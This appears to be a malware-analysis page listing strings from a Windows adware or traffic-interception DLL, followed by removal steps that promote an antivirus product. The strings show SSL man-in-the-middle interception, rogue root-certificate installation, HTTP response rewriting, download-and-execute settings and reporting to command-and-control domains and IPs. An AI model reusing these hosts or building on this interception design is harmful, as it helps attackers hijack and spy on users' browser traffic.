rsa operations not supported
unsupported encryption type
unsupported label source
unsupported mask algorithm
unsupported mask parameter
unsupported signature type
PKEY_RSA_CTRL
PKEY_RSA_CTRL_STR
PKEY_RSA_SIGN
PKEY_RSA_VERIFY
PKEY_RSA_VERIFYRECOVER
RSA_BUILTIN_KEYGEN
RSA_check_key
RSA_generate_key
RSA_generate_key_ex
COMPUTE_KEY
DH_CMS_SET_PEERKEY
DH_compute_key
DH_generate_key
GENERATE_KEY
PKEY_DH_DERIVE
PKEY_DH_KEYGEN
invalid public key
DSA_generate_key
PKEY_DSA_CTRL
PKEY_DSA_KEYGEN
ECDH_compute_key
AESNI_INIT_KEY
AES_INIT_KEY
AES_T4_INIT_KEY
CAMELLIA_INIT_KEY
CMLL_T4_INIT_KEY
D2I_PKEY
DSAPKEY2PKCS8
DSA_PKEY2PKCS8
ECDSA_PKEY2PKCS8
ECKEY_PKEY2PKCS8
EVP_CIPHER_CTX_set_key_length
EVP_PKCS82PKEY
EVP_PKCS82PKEY_BROKEN
EVP_PKEY2PKCS8_broken
EVP_PKEY_copy_parameters
EVP_PKEY_CTX_ctrl
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_dup
EVP_PKEY_decrypt
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt_old
EVP_PKEY_derive
EVP_PKEY_derive_init
EVP_PKEY_derive_set_peer
EVP_PKEY_encrypt
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt_old
EVP_PKEY_get1_DH
EVP_PKEY_get1_DSA
EVP_PKEY_GET1_ECDSA
EVP_PKEY_get1_EC_KEY
EVP_PKEY_get1_RSA
EVP_PKEY_keygen
EVP_PKEY_keygen_init
EVP_PKEY_new
EVP_PKEY_paramgen
EVP_PKEY_paramgen_init
EVP_PKEY_sign
EVP_PKEY_sign_init
EVP_PKEY_verify
EVP_PKEY_verify_init
EVP_PKEY_verify_recover
EVP_PKEY_verify_recover_init
FIPS_CIPHER_CTX_SET_KEY_LENGTH
PKCS5_PBE_keyivgen
PKCS5_v2_PBE_keyivgen
PKCS5_V2_PBKDF2_KEYIVGEN
PKEY_SET_TYPE
aes key setup failed
bad key length
bn pubkey error
camellia key setup failed
command not supported
ctrl operation not implemented
different key types
expecting an rsa key
expecting a dh key
expecting a dsa key
expecting a ecdsa key
expecting a ec key
invalid key length
invalid operation
keygen failure
method not supported
no key set
no operation set
operaton not initialized
private key decode error
private key encode error
unsuported number of rounds
unsupported algorithm
unsupported keylength
unsupported key derivation function
unsupported key size
unsupported prf
unsupported private key algorithm
unsupported salt type
d2i_PKCS8PrivateKey_bio
d2i_PKCS8PrivateKey_fp
DO_PK8PKEY
DO_PK8PKEY_FP
PEM_F_PEM_WRITE_PKCS8PRIVATEKEY
PEM_PK8PKEY
PEM_READ_BIO_PRIVATEKEY
PEM_READ_PRIVATEKEY
PEM_WRITE_PRIVATEKEY
error converting private key
expecting private key blob
expecting public key blob
keyblob header parse error
keyblob too short
problems getting password
public key no rsa
read key
unsupported encryption
unsupported key components
certificate verify error
decrypted key is wrong length
encryption not supported for this key type
no recipient matches certificate
no recipient matches key
operation not supported on this type
private key does not match certificate
signer certificate not found
signing not supported for this key type
unable to find certificate
unknown operation
unsupported cipher type
unsupported content type
PKCS7_add_certificate
cant check dh key
cert already in hash table
key type mismatch
key values mismatch
loading cert dir
no cert set for us to verify
public key decode error
public key encode error
unable to get certs public key
unknown key type
ADD_CERT_DIR
GET_CERT_BY_SUBJECT
X509_check_private_key
X509_get_pubkey_parameters
X509_load_cert_crl_file
X509_load_cert_file
X509_PUBKEY_get
X509_PUBKEY_set
X509_REQ_check_private_key
X509_STORE_add_cert
X509_verify_cert
R2I_CERTPOL
S2I_ASN1_SKEY_ID
S2I_SKEY_ID
V2I_AUTHORITY_KEYID
V2I_EXTENDED_KEY_USAGE
extension setting not supported
no issuer certificate
no proxy cert policy language defined
no public key
operation not defined
policy syntax not currently supported
unable to get issuer keyid
unsupported option
PKCS12_add_localkeyid
PKCS12_key_gen_asc
PKCS12_key_gen_uni
PKCS12_MAKE_KEYBAG
PKCS12_MAKE_SHKEYBAG
PKCS12_newpass
PKCS12_PBE_keyivgen
PKCS8_add_keyusage
key gen error
unsupported pkcs12 mode
WIN32_JOINER
functionality not supported
ENGINE_cmd_is_executable
ENGINE_ctrl_cmd
ENGINE_ctrl_cmd_string
ENGINE_get_pkey_asn1_meth
ENGINE_get_pkey_meth
ENGINE_load_private_key
ENGINE_load_public_key
ENGINE_load_ssl_client_cert
ENGINE_UNLOAD_KEY
cmd not executable
failed loading private key
failed loading public key
invalid cmd name
invalid cmd number
unimplemented public key method
OCSP_cert_id_new
OCSP_parse_url
PARSE_HTTP_LINE1
error parsing url
no certificates in chain
unsupported requestorname type
ESS_ADD_SIGNING_CERT
ESS_CERT_ID_NEW_INIT
ESS_SIGNING_CERT_NEW_INIT
TS_CHECK_SIGNING_CERTS
TS_MSG_IMPRINT_set_algo
TS_REQ_set_msg_imprint
TS_RESP_CTX_set_certs
TS_RESP_CTX_set_signer_cert
TS_TST_INFO_set_msg_imprint
TS_VERIFY_CERT
ess add signing cert error
ess signing certificate error
invalid signer certificate purpose
unsupported md algorithm
unsupported version
certificate already present
certificate has no keyid
error getting public key
error setting key
invalid encrypted key length
invalid key encryption parameter
msgsigdigest error
msgsigdigest verification failure
msgsigdigest wrong length
not key agreement
not key transport
not supported for this key type
no key
no key or cert
no msgsigdigest
no password
no private key
unsupported kek algorithm
unsupported key encryption algorithm
unsupported recipient type
unsupported recpientinfo type
CMS_add0_cert
CMS_add0_recipient_key
CMS_add0_recipient_password
CMS_add1_recipient_cert
CMS_decrypt_set1_key
CMS_decrypt_set1_password
CMS_decrypt_set1_pkey
CMS_EncryptedData_set1_key
CMS_GET0_CERTIFICATE_CHOICES
cms_msgSigDigest_add1
CMS_RecipientInfo_ktri_cert_cmp
CMS_RecipientInfo_set0_key
CMS_RecipientInfo_set0_password
CMS_RecipientInfo_set0_pkey
cms_set1_keyid
CMS_SIGNERINFO_VERIFY_CERT
lhash part of OpenSSL 1.0.2h 3 May 2016
0123456789
CONF part of OpenSSL 1.0.2h 3 May 2016
ASN.1 part of OpenSSL 1.0.2h 3 May 2016
EC part of OpenSSL 1.0.2h 3 May 2016
.\crypto\ec\ec_key.c
public_key
X509_PUBKEY
.\crypto\asn1\x_pubkey.c
'() ,-./:=?
x%s
%s - d:d:d%.*s %d%s
keyid
X509_CERT_AUX
X509_CERT_PAIR
AUTHORITY_KEYID
d.otherName
d.rfc822Name
d.dNSName
d.directoryName
d.ediPartyName
d.uniformResourceIdentifier
d.iPAddress
d.registeredID
Key Compromise
keyCompromise
Cessation Of Operation
cessationOfOperation
Certificate Hold
certificateHold
name.fullname
name.relativename
%*s%s:
%*sOnly User Certificates
%*sOnly CA Certificates
%*sOnly Attribute Certificates
%d.%d.%d.%d/%d.%d.%d.%d
pkeyalg
pkey
PKCS8_PRIV_KEY_INFO
.\crypto\evp\evp_pkey.c
RSA part of OpenSSL 1.0.2h 3 May 2016
Diffie-Hellman part of OpenSSL 1.0.2h 3 May 2016
DSA part of OpenSSL 1.0.2h 3 May 2016
value.set
value.single
ddddddZ
ddddddZ
value.named_curve
value.parameters
value.implicitlyCA
privateKey
publicKey
EC_PRIVATEKEY
p.other
p.onBasis
p.tpBasis
p.ppBasis
p.prime
p.char_two
pub_key
priv_key
d.other
d.data
d.sign
d.enveloped
d.signed_and_enveloped
d.digest
d.encrypted
cert
key_enc_algor
enc_key
pubkey
Content-Length: %d
%s %s HTTP/1.0
SHA1 part of OpenSSL 1.0.2h 3 May 2016
SHA-256 part of OpenSSL 1.0.2h 3 May 2016
SHA-512 part of OpenSSL 1.0.2h 3 May 2016
CERTIFICATE
unable to get issuer certificate
unable to get certificate CRL
unable to decrypt certificate's signature
unable to decode issuer public key
certificate signature failure
certificate is not yet valid
certificate has expired
format error in certificate's notBefore field
format error in certificate's notAfter field
self signed certificate
self signed certificate in certificate chain
unable to get local issuer certificate
unable to verify the first certificate
certificate chain too long
certificate revoked
invalid CA certificate
invalid non-CA certificate (has CA markings)
proxy certificates not allowed, please set the appropriate flag
unsupported certificate purpose
certificate not trusted
certificate rejected
authority and subject key identifier mismatch
key usage does not include certificate signing
unable to get CRL issuer certificate
key usage does not include CRL signing
key usage does not include digital signature
invalid or inconsistent certificate extension
invalid or inconsistent certificate policy extension
Unsupported extension feature
name constraints minimum and maximum not supported
unsupported name constraint type
unsupported or invalid name constraint syntax
unsupported or invalid name syntax
Suite B: certificate version invalid
Suite B: invalid public key algorithm
.\crypto\engine\eng_pkey.c
PEM part of OpenSSL 1.0.2h 3 May 2016
Enter PEM pass phrase:
phrase is too short, needs to be at least %d chars
ANY PRIVATE KEY
ENCRYPTED PRIVATE KEY
PRIVATE KEY
X509 CERTIFICATE
NEW CERTIFICATE REQUEST
CERTIFICATE REQUEST
TRUSTED CERTIFICATE
os.length <= (int)sizeof(ret->session_id)
OpenSSL 1.0.2h 3 May 2016
.\ssl\ssl_cert.c
TLSv1 part of OpenSSL 1.0.2h 3 May 2016
value.other
value.x509cert
value.sdsicert
value.keybag
value.shkeybag
value.safes
value.bag
DES part of OpenSSL 1.0.2h 3 May 2016
libdes part of OpenSSL 1.0.2h 3 May 2016
IDEA part of OpenSSL 1.0.2h 3 May 2016
EVP part of OpenSSL 1.0.2h 3 May 2016
RC2 part of OpenSSL 1.0.2h 3 May 2016
.pp@0
aEÐ
 (#EÚ
ÚE<<0
keylen <= sizeof key
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
CONF_def part of OpenSSL 1.0.2h 3 May 2016
[%s] %s=%s
[[%s]]
Key Encipherment
keyEncipherment
Key Agreement
keyAgreement
Certificate Sign
keyCertSign
EXTENDED_KEY_USAGE
PKEY_USAGE_PERIOD
%*sZone: %s, User:
<unsupported>
othername:<unsupported>
X400Name:<unsupported>
EdiPartyName:<unsupported>
email:%s
DNS:%s
URI:%s
IP Address:%d.%d.%d.%d
.\crypto\x509v3\v3_skey.c
.\crypto\x509v3\v3_akey.c
%*scrlUrl:
CERTIFICATEPOLICIES
d.cpsuri
d.usernotice
%*sCPS: %s
%*sOrganization: %s
%*sNumber%s:
%*sExplicit Text: %s
%*sPolicy Text: %s
XX
%.14s.dZ
%*sSigned Certificate Timestamp:
RAND part of OpenSSL 1.0.2h 3 May 2016
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
PROXY_CERT_INFO_EXTENSION
X:
%lu:%s:%s:%d:%s
Private-Key: (%d bit)
Public-Key: (%d bit)
Private-Key
Public-Key
%s: (%d bit)
DH Private-Key
DH Public-Key
private-key:
public-key:
recommended-private-length: %d bits
.\crypto\dh\dh_key.c
%'%1$=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
nkey <= EVP_MAX_KEY_LENGTH
.\crypto\evp\evp_key.c
?456789:;<=
!"#$%&'()* ,-./0123
SSLv3 part of OpenSSL 1.0.2h 3 May 2016
CLIENT_RANDOM %s %s
c:/sslkey/laskeydb.log
key expansion
client write key
server write key
%s:%d: rec->data != rec->input
j <= (int)sizeof(ctx->key)
keyfunc
keylength
ECDSA part of OpenSSL 1.0.2h 3 May 2016
.\crypto\pkcs12\p12_key.c
.\out32/.\out32/ssl/certs
.\out32/.\out32/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_FILE
ADVAPI32.DLL
KERNEL32.DLL
NETAPI32.DLL
USER32.DLL
rsa_keygen_bits
rsa_keygen_pubexp
hexkey
%s %s%lu (%s0x%lx)
ASN1 OID: %s
NIST CURVE: %s
Field Type: %s
Basis Type: %s
CMS_CertificateChoices
d.issuerAndSerialNumber
d.subjectKeyIdentifier
d.crl
certificates
keyEncryptionAlgorithm
encryptedKey
CMS_KeyTransRecipientInfo
keyAttrId
keyAttr
CMS_OtherKeyAttribute
CMS_RecipientKeyIdentifier
d.rKeyId
CMS_KeyAgreeRecipientIdentifier
CMS_RecipientEncryptedKey
CMS_OriginatorPublicKey
d.originatorKey
CMS_OriginatorIdentifierOrKey
recipientEncryptedKeys
CMS_KeyAgreeRecipientInfo
keyIdentifier
keyDerivationAlgorithm
CMS_PasswordRecipientInfo
d.ktri
d.kari
d.kekri
d.pwri
d.ori
d.signedData
d.envelopedData
d.digestedData
d.encryptedData
d.authenticatedData
d.compressedData
d.allOrFirstTier
d.receiptList
keyInfo
otherCertFormat
otherCert
CMS_OtherCertificateFormat
d.certificate
d.extendedCertificate
d.v1AttrCert
d.v2AttrCert
Load certs from files in a directory
%s%clx.%s%d
s->init_num == (int)s->d1->w_msg_hdr.msg_len   DTLS1_HM_HEADER_LENGTH
((long)msg_hdr->msg_len) > 0
invalid state reached %s:%d
s->d1->w_msg_hdr.msg_len   ((s->version==DTLS1_BAD_VER)?3:DTLS1_CCS_HEADER_LENGTH) == (unsigned int)s->init_num
s->d1->w_msg_hdr.msg_len   DTLS1_HM_HEADER_LENGTH == (unsigned int)s->init_num
retransmit: message %d non-existant
RSA PRIVATE KEY
DSA PRIVATE KEY
EC PRIVATE KEY
GOST signature length is %d
Verifying - %s
TXT_DB part of OpenSSL 1.0.2h 3 May 2016
DTLSv1 part of OpenSSL 1.0.2h 3 May 2016
NETSCAPE_CERT_SEQUENCE
ECDH part of OpenSSL 1.0.2h 3 May 2016
%s.dll
.\crypto\asn1\x_pkey.c
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
Visual C   CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
c:\sslkey\dump.log
c:\sslkey\modified.log
HTTPS
Request[%s]:original
Request[%s]:modified
Respond[%s]:original
Respond[%s]:modified
Request[%s]:original end
Request[%s]:modified end
Respond[%s]:original end
Respond[%s]:modified end
iexplore.exe
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Http\UserChoice\
http\shell\open\command\
GetDefaultBrowserPath(), RegOpenKeyEx(%s) fail, error=%0X
GetDefaultBrowserPath(), RegQueryValueEx(%s) fail, dwType=%0X, error=%0X
GetDefaultBrowserPath(), RegQueryValueEx(%s) OK, wszBuffer=%s
NfCheckDns pid=%d, Domain=%s
NfCheckDns process[%s], processId=%d, rmport=%d, remoteAddr=%s, iFlag=%d, process not read for SSL, soSSL ByPass
NfCheckDns process[%s], processId=%d, rmport=%d, remoteAddr=%s, iFlag=%d, process not ready for SSL, soSSL ByPass, errno=%x
opera.exe
NfCheckDns process is opera.exe version=%s
[1234567890.] 
NfCheckDns IP=%s match
NfCheckDns is not ssl Try Domain=%s
NfCheckDns have try SSL Domain=%s icount=%d, match
NfCheckDns try SSL Domain=%s icount=%d
NfCheckDns Domain=%s match, i=%d
NfCheckDns Domain=%s not match
NfCheckSSLDomain pid=%d, Domain=%s
NfCheckSSLDomain IP=%s match
NfCheckSSLDomain Domain=%s match, i=%d
NfCheckSSLDomain Domain=%s not match
RefreshDns domain=%s
RefreshDns m_SSLIPMap p->Flags.DW=%x, DNSREC_AUTHORITY ip=%s
RefreshDns m_SSLIPMap.insert m_SSLIPMap ip=%s
hXXps://([^/:] ):443/(S*)
HTTP/1.1 302 Found
cdf4rz.dangyu.info
54.201.224.55
get_httpresp: connect [%s] faile
get_httpresp: connect [%s] ok
get_httpresp: try connect ip=%s
get_httpresp: send(%s) faile
GET /%s/log/err.php HTTP/1.1
Host: %s
QUDAO: %s
Agent: %s
MACS: %s
ERRIMG: %s
Cookie: %s
NfCheckRules process[%s], rmport=%d, remoteAddr=%s, iFlag=%d
HTTP/1.1 200 OK
hXXp://([^/] )/(\S*)
ProxyReq PxAct=%s
ProxyReq PxAct=Fellow, URL=%s
ProxyReq PxAct=Fellow, headers=%s
ProxyReq PxAct=Fellow, RespToMSTCP httpresp=%.*s
PxyRspUrl
ProxyReq PxyRsp, PxyRspUrl=%s
Post_PxyRsp , PxyRspUrl=%.*s
[NF]rule[%d][%s], format=%.*s not support %%*,n
[NF]rule[%d][%s], format=%.*s [%d,%d] over range!!!!
[NF]rule[%d][%s], format=%.*s [%d,%d] not exist!!!!
nurl
toexe.filename
toexe.args
nrspurl
rw_rule[%d]: iTimes[%d] - rw_checktime[%d] >= rw_rule[%d].rw_fttime[%d]
rw_rule[%d]: iTimes[%d] >= GlobalVars::gst_rw_rule[%d].iLimits[%d]
CheckGetType rw_rule[%d] rw_conds[%d] is not Match, but refered!!!!
rr_rule[%d]: iTimes[%d] >= GlobalVars::gst_rr_rule[%d].iLimits[%d]
[NF]Replace rule[%d], format=%.*s [%d,%d] not exist!!!!
CheckRRType rorgcap[%d][%d]=%.*s!
ReqRep icond=%d: HS_STATUS[ilen=%d]:%.*s
ReqRep icond=%d: HS_HEAD[%s]:%s
ReqRep icond=%d: HS_CONTENT:%.*s
ReqRep Header.toSting()=%s
ReqRep[request_regrsp] icond=%d: HS_STATUS[ilen=%d]:*s
ReqRep[request_regrsp] icond=%d: HS_HEAD[%s]:%s
ReqRep[request_regrsp] icond=%d: HS_CONTENT:*s
ReqRep finished: HS_STATUS:%s
GET /%.*s HTTP/1.1
User-Agent: Mozilla/5.0 (gid %s; cid %s)
get_httpresp: start!!, url=%.*s, headers=%s
get_httpresp: sendbuf=%s
get_httpresp: domain=%s
POST /%.*s HTTP/1.1
post_httpresp: start!! url=%.*s, headers=%s, postbody=%s
post_httpresp: sendbuf=%s
post_httpresp: domain=%s
%s size too small , the value=%.*s
g_debug=%d
g_charorg=%s
g_charmap=%s
g_exclude[%d]=%s
g_download [%d]= %s %d %s
g_precmd
([WwTt][SsHh])\s (\d )\s "([^"]*)"\s ([^\r\n]*)
g_precmd [%d]= %d %d %s %s
g_postcmd
g_postcmd [%d]= %d %d %s %s
g_postproinfo=%d
g_limflagip=%s
g_maxnet=%d
g_muteip=%s
g_rrurl
g_rrurl valus=[%.*s]!
g_irrecd valus=[%.*s]! GlobalVars::g_irrecd=%d
g_imaxrcv valus=[%.*s]! GlobalVars::g_imaxrcv=%d
g_bFilterSSL=%d
g_rootm_x509URL
g_rootm_x509URL valus=[%.*s]!
g_rootm_pkeyURL
g_rootm_pkeyURL valus=[%.*s]!
g_rootm_x509Len=%d
g_rootm_pkeyLen
g_rootm_pkeyLen=%d
g_rootm_subject=%s
g_blockspdy=%d
g_rootm_x509RegURL
g_rootm_x509RegURL valus=[%.*s]!
g_sslkey
g_sslkey valus=[%.*s],expanded keyfile=%s!
g_rootm_x509RegLen=%d
g_tjdefbrowser=%d
g_tjssldomain=%d
g_rptsslrdy=%d
g_sslbrowser=%s
g_ssltrybrowser=%s
g_ssldomain2ip=%d
g_heartbeat=%d
nf_rule GlobalVars::i_rules=%d, domain=%s
gethostbyname(%s) error
nf_rule GlobalVars::i_rules=%d, domain=%s be resolved
rw_id valus=[%.*s] crw_rule.rw_id=%d
rw_cond match=[%.*s %.*s], isNOT = %d, isOR=%d, replace=[%.*s]!
rw_act valus=[%.*s]! crw_rule.rw_act=%d
rw_tounzip valus=[%.*s]! crw_rule.tounzip=%d
rw_psturl
rw_psturl valus=[%.*s]!
rw_limit valus=[%.*s] crw_rule.iLimits=%d
rw_arfi already exist index[%d]=%s!
rw_arfi dont exist index[%d]=%s, filename=%.*s!
rw_arfi new one index[%d]=%s!
rw_nurl
rw_nurl valus=[%.*s]!
rw_groupid valus=[%.*s] > MAX_GROUPS reset crw_rule.groupid=%d
rw_groupid valus=[%.*s] crw_rule.groupid=%d
rw_ckid valus=[%.*s] crw_rule.rw_ckid=%d
rw_fttime valus=[%.*s] crw_rule.rw_fttime=%d
rw_act valus=[%.*s]! crw_rule.rw_checktimemode=%d
rw_execmd
rw_execmd = %d %d %s %s
rw_map[%d] [%s] ==> [%s]!
nf_rule m_dnsrules.insert(%s)
nf_rule m_dnsset.insert(%s)
nf_rule GlobalVars::i_rules=%d, add m_SSLIPMap[%s] ip=%s
nf_rule GlobalVars::i_rules=%d, add m_SSLIPMap[%s] ip=%d.%d.%d.%d
nf_dns GlobalVars::gi_dns=%d, match rules=%s, resolve ip=%d.%d.%d.%d
icur_rrrule=%d, iget_conds=%d, rq_cond match=[%.*s %.*s], isNOT = %d, isOR=%d, replace=[%.*s]!
icur_rrrule=%d, irsp_conds=%d, rr_cond match=[%.*s %.*s], isNOT = %d, isOR=%d, replace=[%.*s]!
rr_act valus=[%.*s]! crw_rule.rr_act=%d, g_rrmode=%d
rr_rspurl
rr_rspurl valus=[%.*s]!
rr_tounzip valus=[%.*s]! crr_rule.rw_tounzip=%d
certinfo.daysValid=%d
certinfo.sigType=%d
certinfo.subject.commonName=%s
certinfo.subject.country=%s
certinfo.subject.email=%s
certinfo.subject.friendName=%s
certinfo.subject.locality=%s
certinfo.subject.org=%s
certinfo.subject.state=%s
certinfo.subject.sur=%s
certinfo.subject.unit=%s
pf_insertCADns(%s,%s)
VerifyCertContent fail, sleept=%d, give up
VerifyCertContent fail, sleept=%d
Process_Config get x509[%s], ntStatus=%d, lssl=%d
Process_Config get pkey[%s], ntStatus=%d, lssl=%d
cdf4pz.dangyu.info
cdf4pz.insearchs.com
hXXp://%s:%d/%s/adobe.com/config.php
09:18:02
MAC: %s
BT: %s %s
Proc: %s
PathUnExpandEnvStrings %s fail
CreateFile %s faile, errno=%d
hXXp://
rw_rsps[%d]:%.*s
reps=%.*s, isBackRef=%d
refcap[%d][%d] malloc:%.*s
processReceive[respond_regrsp] icond=%d: HS_STATUS[ilen=%d]:*s
processReceive[respond_regrsp] icond=%d: HS_HEAD[%s]:%s
processReceive[respond_regrsp] icond=%d: HS_CONTENT:*s
processRReceive rsps[%d]->ePF == HS_HEADER, find Header[%s], length=%d
processReceive rsps[%d]->ePF == HS_HEADER, find Header[%s]
processReceive rsps[%d]->ePF == HS_CONTENT/HS_STATUS, iLen=%d, content=%.*s
processRReceive %%d,d reps =%.*s
processRReceive not %%d,d reps =%.*s
processRReceive reps=%.*s isBackRef=%d
processRReceive rw_rsps[%d] match cap=%.*s
processRReceive i=%d rw_rsps cap=%.*s,%%%d^%%%d
processRReceive i=%d rrsp_conds cap=%.*s,%%%d^%%%d
ReportRecord: iformat=%d, format=%.*s
processRReceive 8 pTcpNE->rorgcap[1][0]=%.*s
ReportRecord irrule=%d, icond=%d, igroup=%d, rorgcap=%.*s, len=%d, record=%.*s, len=%d
ReportRecord: 2 iformat=%d, format=%.*s
ReportRecord irrule=%d, record=%.*s, ilen=%d
ReportRecord: 3 iformat=%d, format=%.*s
ReportRecord: 4 iformat=%d, format=%.*s
ProcRR, ReportRecord len=%d, buff:%.*s
ProcRR sendrpt %s
CheckGetType(id=%I64u) gettype= %d
rrtype= %d
{"browser":"%s","conn":"%s=>%s","httperr":"RspUncompress fail,rt=%d"}
httperr %s
()$^.* ?[]|\-{},:=!
threadStart id=%d
NfCheckRules (id=%I64u) localport=%d, localAddr=%s, rmport=%d, remoteAddr=%s, iFlag=%d
{"browser":"%s","ssltry":"FAIL"}
LogSSLTryBrowser %s
{"browser":"%s","ssltry":"OK"}
{"browser":"%s","conn":"%s=>%s","domain":"%s"}
LogSSLDomain %s
dataPartAvailable OT_SSL_HANDSHAKE_OUTGOING rt=%d, hostname=%.*s
{"browser":"%s","sslerr":"%s"}
LogSSLException %s
have %s
VVV.baidu.com
VVV.google.com
VVV.126.com
%s.tmp
downloadfile[%s] fail
1.3.6.1.5.5.7.3.1
1.3.6.1.4.1.311.10.3.3
2.16.840.1.113730.4.1
nf_getProcessName=%s, pproc=%s
resolve wmi_dirip[%s]=%s OK
%.4d%.2d%.2d %.2d:%.2d:%.2d:%d
nf_getDisplayFromKernel g_MACs=%s
getMACInfo %s
{"defbrowser":"%s","version":"%s"}
heartbeat upt=%d minutes
tfpf stop, isnfinit=%d, ispfinit=%d, bIsFaile=%d, living time=%d!
{"ImageBase":"%0X","ImageSize":"%u","buildNumber":"%u"}
HTTP/1.
http/1.
Wtsapi32.dll
SSL\SSLDataProvider.cpp
%s-%s#ss
%s-%s-%s#child
{"browser":"%s","conn":"%s=>%s","domain":"%s","msg":"%s"}
127.0.0.1
SSLFilter.cpp
__FILE__:%s, __LINE__:%d, SSLFilter::tcp_packet() getSelfSignedCert(test) failed
__FILE__:%s, __LINE__:%d, SSLFilter::tcp_packet() sdTemp.init failed
__FILE__:%s, __LINE__:%d, SSLFilter::tcp_packet() bypass exception
__FILE__:%s, __LINE__:%d, SSLFilter::tcp_packet() Weak DH prime, do not filter such connections
__FILE__:%s, __LINE__:%d, addTlsException(TLS_ALL_CIPHERS)
__FILE__:%s, __LINE__:%d, SSL_connect(m_sdRemote.m_pSSL) == 0
__FILE__:%s, __LINE__:%d, getSelfSignedCert fail
__FILE__:%s, __LINE__:%d, getSignedCert fail
__FILE__:%s, __LINE__:%d, m_sdLocal.init fail
__FILE__:%s, __LINE__:%d, BIO_write fail
__FILE__:%s, __LINE__:%d, SSL_accept(m_sdLocal.m_pSSL) fail, err=%d
__FILE__:%s, __LINE__:%d, SSL_get_peer_certificate fail
__FILE__:%s, __LINE__:%d, SSL_accept fail, err=%d
__FILE__:%s, __LINE__:%d, SSLRead_client, err=%d
__FILE__:%s, __LINE__:%d, SFS_SERVER_HANDSHAKE, len == 0
__FILE__:%s, __LINE__:%d, SSL_accept fail, n=0
__FILE__:%s, __LINE__:%d, SSLRead_server, n=%d
__FILE__:%s, __LINE__:%d, SFS_SERVER_HANDSHAKE_REQUEST_CLIENT_CERT, n=0
__FILE__:%s, __LINE__:%d, SSLRead_client, n=%d
__FILE__:%s, __LINE__:%d, SSL_accept, err=%d
__FILE__:%s, __LINE__:%d, SSL_connect(m_sdRemote.m_pSSL), err=%d
__FILE__:%s, __LINE__:%d, SSL_connect(m_sdRemote.m_pSSL), n=%d
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSLFilter::tcp_packet() bypass exception
surfeasy.com
opera-proxy.net
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, host is surfeasy.com or opera-proxy.net
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_connect(m_sdRemote.m_pSSL) err=%d
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_connect(m_sdRemote.m_pSSL) n=0
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, BIO_write fail
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSLRead_client(m_sdRemote) fail
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_connect(m_sdRemote.m_pSSL) fail, errno=%d
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_connect(m_sdRemote.m_pSSL) == 0
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_accept(m_sdLocal.m_pSSL) fail, errno=%d
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_accept(m_sdLocal.m_pSSL) == 0
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, BIO_write < 0
PORT
504 Unsupported transfer mode
504 Unsupported command
PORT
%s.%s.%s.%s:%d
%s:%s
[%s]:%s
File-Count: %d
Total-Bytes: %d
File-Name: %s
{0946134E-4C7F-11D1-8222-444553540000}
|.^$* ?()[\
(Windows%d.%d.%d)
SYSTEM\CurrentControlSet\Services\%s
NBMediaInfo_Adv.ini
%s\system32\%s
NBMediaInfo_Adv.ini;
0.0.0.0
%s:xxxxxx|
1.0.1.0
%d.%d.%d.%d
WARNING: %s failed with error %d (%s)
cdf4ps.dangyu.info
GET /xcldnfpf/log/proclog.php HTTP/1.1
get_httpresp: send(%s) ok
CreateProcessAsUser(%s %s ) fail errno[%d]
WinExecAndWait32(%s %s ) timeout[%d]
H:\nfsdk-src-1.5.1.4-pf-src-1.1.6.8\bin\Release\Win32\PFHttpContentFilter.pdb
PFHttpContentFilter.dll
GetWindowsDirectoryA
KERNEL32.dll
RegOpenKeyExA
RegCloseKey
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
PSAPI.DLL
WS2_32.dll
DNSAPI.dll
CertCreateCertificateContext
CertFreeCertificateContext
CertGetCertificateChain
CertFreeCertificateChain
CertOpenStore
CertAddEncodedCertificateToStore
CertVerifyCertificateChainPolicy
CertCloseStore
CertOpenSystemStoreA
CertEnumCertificatesInStore
CertFindCertificateInStore
CertAddCertificateContextToStore
PFXExportCertStoreEx
CRYPT32.dll
IPHLPAPI.DLL
VERSION.dll
GetProcessHeap
GetCPInfo
PeekNamedPipe
USER32.dll
ReportEventA
OLEAUT32.dll
l}C.we
zcÁ
.?AVHttpFilter@@
.?AVHTTPFilter@ProtocolFilters@@
.?AVSMTPFilter@ProtocolFilters@@
.?AVFTPFilter@ProtocolFilters@@
.?AVFTPDataFilter@ProtocolFilters@@
Inappropriate I/O control opera
C:\Windows\Explorer.EXE
A12E34F2742C243943B043CFE09BBD23.tmp
54.190.23.82
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
combase.dll
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
2.exe
\*.cer
\trec.tmp
\x.tmp
\xtls.tmp
\xv.tmp






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Scan a system with an anti-rootkit tool.
    2. 

  2. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    csc.exe:2736
    csc.exe:1596
    csc.exe:2384
    setup.4.15.f.exe:1656
    enjoyWIFI.exe:892
